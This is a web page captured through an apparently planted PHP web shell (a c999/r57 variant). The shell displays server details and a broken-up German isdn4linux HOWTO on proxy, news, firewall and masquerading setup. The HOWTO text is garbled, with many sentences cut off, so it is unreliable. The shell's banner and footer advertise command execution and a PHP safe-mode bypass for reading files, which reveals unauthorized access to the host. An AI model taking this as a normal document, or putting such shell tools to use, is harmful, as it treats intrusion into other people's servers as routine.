Software: Apache/2.2.3 (CentOS). PHP/5.1.6 uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44 uid=48(apache) gid=48(apache) groups=48(apache) Safe-mode: OFF (not secure) /usr/share/doc/isdn4k-utils-3.2/ drwxr-xr-x |
Viewing file: EN-i4l-11.html (25.6 KB) -rw-r--r-- Select action/file-type: (+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) | 11. Konfiguration der Internet-DiensteVoraussetzung: Die Internet-Verbindung über eine Dial-On-Demand Wählverbindung und das Routing funktioniert. Jetzt sollen (je nach Bedarf) weitere Internetdienste eingerichtet werden. 11.1 DNS-CacheHintergrund: siehe IP-Nummern Auflösung
11.2 SquidSquid ist ein WWW- und FTP-Proxy. Der Vorteil eines Proxies liegt nicht nur darin, Anfragen (für mehrere Benutzer) zu cachen, sondern auch darin, daß Clientrechner im lokalen Netz nicht unbedingt echten Internetzugriff (über Masquerading) haben müssen, was die Übersicht und die Sicherheit erhöht. Squid hat eine Vielzahl von Optionen und Features, die mitgelieferte
Beispielkonfiguration in Starten von SquidBei S.u.S.E. wird über die Manuell kann man squid z.B. durch
Vor dem ersten Start muß das Cache-Directory
initialisiert werden, dies sollte als Benutzer Clients anpassenDie WWW-Browser müssen konfiguriert werden, damit Sie
den Proxy ansprechen. Bei Netscape gibt es die
Maske Zusätzlich sollte man noch das Feld 11.3 FetchmailDas Programm Das Abholen kann auch als normaler User durchgeführt werden, wir holen hier die Mails als Root ab, dadurch läßt sich der Vorgang besser automatisieren. Nach dem Abholen werden die Mails dem lokalen Sendmail übergeben und zugestellt. Der Mailserver sei mail.provider.de. Es gibt zwei Benutzer asterix und obelix, die auf dem lokalen Rechner eva und maria heissen. Als Passwörter werden (auf dem Mailserver) adam und josef benutzt.
Mehr Infos: http://www.suse.de/Support/sdb/fetchmail.html Übung: auf dem Server liegen Mails für jede Workstation
bereit. Richte fetchmail so ein, daß bei jedem Verbindungsaufbau
Mails abgeholt werden. Prüfe die lokale Zustellung.
Siehe
/support-db/sdb/fetchmail.html und
11.4 SendmailÜber Sendmail kann man dicke Bücher schreiben ... (siehe Sendmail. Das S.u.S.E. Paket Wie immer gibt es mehrere Wege:
11.5 NewsOnline News lesen ist schon hiermit sehr einfach, als News-Server
den Server des ISP angeben. Dazu muß man für die meisten
News-Read die Variable Wünschenswert ist natürlich News-Offline zu lesen und entweder bei Bedarf zu holen bzw. zu verschicken oder dieses per Cron-Job z.B. jede Nacht durchführen zu lassen. Die Installation eines eigenen News-Servers ist recht aufwendig, es bieten sich CNews oder INN an. Siehe dazu News-Howto (fixme). Ein eigener News-Server ist aber eigentlich nur dann notwendig, wenn man auf diesem selber Newsgruppen einrichten möchte. Will man das nicht, sind CNews und INN vollkommen overkilled, deshalb möchte ich hier zwei andere Möglichkleiten vorstellen: Zwei Pakete bieten sich an: Leafnode und slrn. Beide sind einfach einzurichten und zu warten und eignen sich für ein mittleres Newsaufkommen vollkommen aus. slrn ist eigentlich ein eigener News-Reader
(textorientiert, sehr flexibel und schnell) und bietet
ein eigenes Programm Leafnode stellt dagegen einen eigenen News-Server zur Verfügung, braucht aber insgesamt mehr Ressourcen. Der Trick bei Leafnode ist der, das sich der Server quasi selbst konfiguriert: wird von einem Client auf eine Gruppe zugegriffen, wird diese automatisch abonniert und ist beim nächsten Abgleich vorhanden; wird dagegen längere Zeit nicht (mehr) auf eine Gruppe zugegriffen, wird diese automatisch gelöscht. Man kann Leafnode also in einem kleineren Netz mit mehreren Lesern trotzdem nahezu unbeaufsichtigt laufen lassen. Beide Programme arbeiten sehr gut in dieser Dial-On-Demand-Umgebung, Zugriffe auf den News-Server beim Provider werden nur auf Wunsch, nie aber automatisch ausgeführt. slrn installieren und konfigurierenDie getestete Version ist 0.9.5.2 von ftp://space.mit.edu/pub/davis/slrn Es wird die slang-Bibliothek ab Version 1.0.3 benötigt (bei S.u.S.E. 5.2 ist noch 0.99.38 dabei), zu bekommen unter ftp://space.mit.edu/pub/davis/slang Beim Compilieren nicht vergessen auch
install -m 755 -o root -g root src/objs/slrn /usr/local/bin install -m 755 -o root -g root src/objs/slrnpull /usr/local/bin install -d /usr/doc/packages/slrn -m 755 -o root -g root install -m 644 -o root -g root doc/* /usr/doc/packages/slrn install -m 644 -o root -g root COPYRIGHT /usr/doc/packages/slrn install -m 644 -o root -g root COPYING /usr/doc/packages/slrn install -m 644 -o root -g root README /usr/doc/packages/slrn install -m 644 -o root -g root changes.txt /usr/doc/packages/slrn install -m 644 -o root -g root doc/slrn.1 /usr/local/man/man1 install -d /usr/doc/packages/slrn/slrnpull -m 755 -o root -g root install -m 644 -o root -g root slrnpull/* /usr/doc/packages/slrn/slrnpull Dann das Spool-Verzeichnis anlegen und die Config-Datei erstellen: mkdir /var/spool/slrnpull cd /var/spool/slrnpull cp /src/slrn/slrnpull/slrnpull.conf . In default 0 14 de.alt.comm.isdn4linux Jetzt noch den News-Reader auf diesen Spool-Pfad
konfigurieren, in %%% Spool set spool_inn_root "/var/spool/slrnpull" set spool_root "/var/spool/slrnpull/news" set spool_nov_root "/var/spool/slrnpull/news" set use_slrnpull 1 set read_active 1 set server_object "spool" hostname "klaus.franken.de" set username "kfr" Das Abholen, Verschicken eigener News und das Löschen alten Artikel geschieht mit einem einzigen Kommando (als root), z.B.: slrnpull -d /var/spool/slrnpull -h news.franken.de Beim ersten Mal dauert das natürlich sehr lange und sollte daher
manuell ausgeführt werden. Im Betrieb kann man das über einen
Croneintrag oder in Beim manuellen Start gibt Leafnode installieren und konfigurierenLeafnode (Version 1.4) gibt es auf ftp://ftp.troll.no/pub/freebies/. Die mitgelieferten Dateien Im folgenden Beispiel werden die Binaries
Zunächst wird der NNTP-Server nntp stream tcp nowait news /usr/sbin/tcpd /usr/local/bin/leafnode Danach ein killall -1 inetd ausführen.
Als nächstes muß ein User und eine Gruppe news:x:9:13::/var/spool/news:/bin/bash Alle Arbeiten müssen dann als User news
ausgeführt werden (als Root: su - news )!
Im Verzeichnis su - news cd /usr/lib/leafnode cp config.example config Die Datei ist kommentiert, hier arbeiten folgende Einträge: server = news.franken.de expire = 20 maxcount = 1000 Jetzt muß man dafür sorgen, daß das Programm
42 5 * * * su news -c texpire um jede Nacht um 5:42 zu löschen. Durch das Kommando In dem man jetzt einmalig durch einen News-Reader
auf diesen Newsserver und auf die interessanten
Gruppen zugreift (es werden natürlich alle mit der
Anzahl 0 angezeigt), werden die Gruppen abonniert.
Beim nächsten Aufruf von Auch hier kann man Probleme: man hat keinen direkten Einfluß darauf,
welche Gruppen abonniert werden. Es sei denn, daß man vor dem
Aufruf von Die Ausgabe von fetch sollte beachtet werden, abgelehnte eigene Postings werden nirgens abgespeichert, sondern einfach gelöscht. 11.6 FirewallHinweis: Firewalls sind ein heikles Thema. Insbesondere Hierfür übernimmt der Autor keine Garantie! Wer eine wirklich sicheres System benötigt, soll zumindest das Firewall Howto lesen oder einen Experten dafür beauftragen. Über Firewalls kann man dicke Bücher schreiben ... (siehe Firewall oder das Firewall Howto. Die einfachste (aber wirkungsvolle) Methode ist die Benutzung
eines Paketfilters, die direkt vom Linux-Kernel unterstützt wird und
über das Kommando Was ist ein Paketfilter?Jedes IP-Paket, das vom Kernel behandelt wird, wird nach einer Regelliste untersucht und entweder akzeptiert oder abgelehnt. Es werden drei verschiedene Listen geführt:
Wie gibt man eine Firewall-Regel an?Der
Weiterhin gibt es folgende wichtige Optionen:
Was für Regeln brauche ich mindestens?Eines der größten Sicherheitslöcher ist das sogenannte Spoofing. Darunter versteht man, daß eine eigentlich fremder Rechner behauptet eine IP-Nummer aus dem eigenen (sicheren) Netz zu haben. Daher müssen als ersten Regeln definiert werden, die verhindern, daß eigene IP-Nummern aus dem unsicheren Netz hereinkommen können. Als nächstes sollte man alle Zugriffe von außen verbieten und nur (bei Bedarf) die benötigten Dienste (sendmail, www) freischalten. Ein einfacher FirewallDas lokale Ethernet ist auf 192.168.42.0 konfiguriert. Wir erwarten IP-Nummer aus dem Bereich 193.110.3.0/24 zugewiesen zu bekommen, wobei der PtP-Partner nicht aus diesem Bereich ist (sonst würden seine Pakete auch abgewiesen werden)
# spoofing verbieten: /sbin/ipfwadm -I -a deny -o -P all -S 192.168.42.0/24 -D 192.168.42.0/24 -W ippp0 /sbin/ipfwadm -I -a deny -o -P all -S 192.168.42.0/24 -D 193.110.3.0/24 -W ippp0 /sbin/ipfwadm -I -a deny -o -P all -S 193.110.3.0/24 -D 192.168.42.0/24 -W ippp0 /sbin/ipfwadm -I -a deny -o -P all -S 193.110.3.0/24 -D 193.110.3.0/24 -W ippp0 # Zugriffe von ueberall auf den Mail-Server (Port 25) erlauben: /sbin/ipfwadm -I -a accept -P tcp -S 0/0 -D 192.168.42.1 25 -W ippp0 # Zugriffe von ueberall auf den DNS-Server (Port 53) erlauben: /sbin/ipfwadm -I -a accept -P tcp -S 0/0 -D 192.168.42.1 53 -W ippp0 # sonst alles verbieten (getrennt fuer Protokoll tcp und udp) /sbin/ipfwadm -I -a deny -o -P tcp -S 0/0 -D 192.168.42.0/24 1:1023 -W ippp0 /sbin/ipfwadm -I -a deny -o -P tcp -S 0/0 -D 193.110.3.0/24 1:1023 -W ippp0 /sbin/ipfwadm -I -a deny -o -P udp -S 0/0 -D 192.168.42.0/24 1:1023 -W ippp0 /sbin/ipfwadm -I -a deny -o -P udp -S 0/0 -D 193.110.3.0/24 1:1023 -W ippp0 Bei S.u.S.E. läßt sich obiges Bsp. auch in der FW_START="yes" FW_LOCALNETS="192.168.42.0/24 193.110.3.0/24" FW_MAILSERVER="192.168.42.1" FW_DNSSERVER="192.168.42.1" FW_WORLD_DEV="ippp0" FW_LOG_ACCEPT="no" FW_LOG_DENY="yes" FW_TCP_LOCKED_PORTS="1:1023" FW_UDP_LOCKED_PORTS="1:1023" Siehe auch /usr/doc/packages/firewall
11.7 MasqueradingMasquerading (auch Network Adress Translation genannt) braucht man dann, wenn man ein internes Netz mit privaten IP-Nummern hat, vom ISP aber nur eine IP-Nummer (und diese vielleicht sogar dynamisch) bekommt. Die IP-Pakete werden beim rausschicken auf der Internetleitung umgeschrieben und mit der eigenen IP-Nummer versehen. Umgekehrt wird eine Tabelle der offenen Verbindungen gehalten, damit einkommende Pakete wieder dem ursprünglichen Absender zugestellt werden können. Hat man sich mit dem Firewall (Paketfilter via ipfwadm, s.o.)
vertraut gemacht, ist Masquerading fast trivial, denn
es findet an derselben Stelle statt und wird fast genauso
konfiguriert, es wird lediglich der Schalter Beispiel:
Pakete aus dem internen Netzwerk (192.168.42.0/24), die zum Provider
(Device /sbin/ipfwadm -F -a accept -P all -S 192.168.42.0/24 -D 0/0 -m -W ippp0 Bei manchen Internet-Diensten (z.B. ftp) wird nicht nur ein Socket geöffnet, sondern auch ein zweiter für die Datenübertragung, die der Server zum Client aufbaut. Da der Client aber selbst nicht erreichbar ist (private IP-Nummer) und der Server die Verbindung zum falschen Rechner (IZG) aufbaut, klappt diese Methode ohne weiteres Wissen über die speziellen Eigenheiten des entsprechenden Protokolls nicht. Abhilfe schaffen dafür spezielle Routinen, die auch dafür re-maskieren können. Diese werden durch Kernel-Module geladen: /sbin/insmod ip_masq_cuseeme /sbin/insmod ip_masq_ftp /sbin/insmod ip_masq_irc /sbin/insmod ip_masq_quake /sbin/insmod ip_masq_raudio /sbin/insmod ip_masq_vdolive Bei S.u.S.E. läßt sich obiges Bsp. auch in der MSQ_START="yes" MSQ_NETWORKS="192.168.42.0/24" MSQ_DEV="ippp0" MSQ_MODULES="ip_masq_cuseeme ip_masq_ftp ip_masq_irc ip_masq_quake ip_masq_raudio ip_masq_vdolive" Siehe auch /usr/doc/packages/firewall
11.8 AccountingSiehe 11.9 SambaSamba ist ein File- und Druckerserver für das unter Windows benutzte SMB-Protokoll. Das Thema gehört also garnicht hier her... doch: denn es kann in unserem Fall Probleme machen. Beim SMB-Protokoll wird sehr viel mit Broadcasts gearbeitet, die Rechner schicken sich ständig (auch wenn eigentlich keine Aktionen ausgeführt werden) Nachrichten zu. Der Samba-Server wird meist so ausgeliefert, daß dieser alle verwendendbaren Netzdevices benutzt und dorthin Nachrichten schickt, also auch an das ippp0-Device. Folge: es werden ständig Verbindungen aufgebaut! Abhilfe:
Next Previous Contents |
:: Command execute :: | |
:: Shadow's tricks :D :: | |
Useful Commands
|
:: Preddy's tricks :D :: | |
Php Safe-Mode Bypass (Read Files)
|
--[ c999shell v. 1.0 pre-release build #16 Modded by Shadow & Preddy | RootShell Security Group | r57 c99 shell | Generation time: 0.0125 ]-- |